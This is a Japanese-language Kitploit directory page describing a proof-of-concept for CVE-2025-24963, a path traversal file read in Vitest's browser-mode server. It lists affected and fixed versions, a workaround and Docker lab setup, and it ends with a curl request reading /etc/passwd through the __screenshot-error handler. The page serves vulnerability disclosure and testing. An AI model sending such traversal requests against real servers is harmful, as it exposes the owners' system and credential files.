Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-24963 — CVE-2025-24963の概念実証エクスプロイト。Vitestブラウザモードにおける__screenshot-errorハンドラを介したローカルファイル読み取りの脆弱性で、公開サーバー上で任意のファイルを開示することが可能。 | Kitploit
ツール/GitHubGitHub/hiteshpatra/cve-2025-24963
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubhiteshpatra/cve-2025-24963

CVE-2025-24963

CVE-2025-24963の概念実証エクスプロイト。Vitestブラウザモードにおける__screenshot-errorハンドラを介したローカルファイル読み取りの脆弱性で、公開サーバー上で任意のファイルを開示することが可能。

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-24963 - Vitestブラウザモード - ローカルファイル読み取り

​CVE-2025-24963 は、Vite をベースにした Vitest テストフレームワークのコンポーネントである @vitest/browser パッケージに影響する中程度の深刻度の脆弱性(CVSS 3.1 スコア: 5.9)です。この脆弱性は、ブラウザモードの HTTP サーバーの __screenshot-error ハンドラにおける不適切な入力検証に起因します。構成オプション browser.api.host: true を使用してサーバーがネットワークに公開されている場合、攻撃者は特別に細工されたリクエストを送信してサーバーのファイルシステム上の任意のファイルにアクセスし、機密情報の不正な開示につながる可能性があります。

影響を受けるバージョン

この脆弱性は、以下のバージョンの @vitest/browser に影響します:​

  • 2.0.4 から 2.1.8
  • 3.0.0 から 3.0.3​

緩和策

この問題はバージョン 2.1.9 および 3.0.4 で修正されました。脆弱性を軽減するために、これらのバージョン以降にアップグレードすることを強く推奨します。​

回避策

すぐにアップグレードできない場合の一時的な回避策として、構成で browser.api.host: true を設定しないことで、ブラウザモードサーバーをネットワークに公開しないようにしてください。これにより、脆弱なハンドラへの外部アクセスを防止できます。

環境の準備

root@kitploit:~
git clone https://github.com/0xdeviner/CVE-2025-24963.git
cd CVE-2025-24963/vitest-vuln-demo
docker build -t vitest-cve-2025-24963 .
docker run -itd --name vitest-cve -p 63315:63315 vitest-cve-2025-24963

注意: Vitest が使用するポートは動的です(例: 63315)。ログを監視し、それに応じて -p フラグを調整することをお勧めします。

エクスプロイト

root@kitploit:~
curl "http://<IP>:63315/__screenshot-error?file=../../../../../../etc/passwd"
ツールをダウンロード